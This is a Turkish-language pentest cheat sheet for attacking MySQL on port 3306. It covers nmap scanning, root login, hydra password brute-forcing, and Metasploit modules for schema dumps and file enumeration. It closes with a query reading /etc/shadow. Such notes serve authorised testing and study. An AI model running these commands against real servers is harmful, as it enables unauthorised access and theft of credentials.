MySQL - 3306

Scan

nmap -v -sV -sC -p 3306 192.168.1.2

Bağlantı

# Connect
mysql -h 192.168.1.2 -u root -p -D <DB>

# Veritabanları
show databases;
# Veritabanı seçer
use users;
# Tabloları listeler
show tables;
# Tablodaki verileri listeler
select * from users;

Brute Force

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.1.3 mysql

Şemaları Gösterme

Veritabanı şemasını gösterir.

msfconsole
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS 192.168.1.3
set USERNAME root
set PASSWORD ""
exploit

Dosya Listeleme ve Okuma

Sunucudaki hangi dosyaların yazılabilir olduğunu gösterir.

msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set RHOSTS 192.168.1.3
set VERBOSE false
set USER root
set PASSWORD password123
exploit

Sunucudaki dosyaların hangilerinin okunabilir olduğunu gösterir.

msfconsole
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS 192.168.1.3
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
set USER root
set PASSWORD password123
exploit

Sunucudaki dosyayı okur.

mysql -h 192.168.1.3 -u root
select load_file("/etc/shadow");

Last updated